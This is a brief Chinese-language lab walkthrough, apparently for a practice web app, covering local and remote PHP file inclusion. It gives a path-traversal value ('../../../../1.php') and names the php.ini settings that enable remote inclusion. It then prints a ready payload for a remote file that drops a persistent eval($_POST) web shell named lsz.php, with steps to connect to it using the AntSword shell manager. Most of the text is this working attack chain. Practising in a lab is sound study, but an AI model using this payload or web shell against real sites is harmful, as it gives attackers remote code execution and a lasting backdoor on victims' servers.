File inclusion(local)
创建1.php
步骤一:选择一个球员提交
../../../../1.php
File Inclusion(remote)(远程文件包含)
步骤一:更改参数
php.ini ⾥有两个重要的参数
allow_url_fopen 、allow_url_include
;
步骤二:选择球员
步骤三:宝塔公网上创建一个6.txt文件,里面输入<?php fputs(fopen("lsz.php","w"),'<?php eval($_POST["cmd"]);?>')?>
步骤四:fileinclude目录下找到php文件
步骤五:访问php文件,蚁剑连接
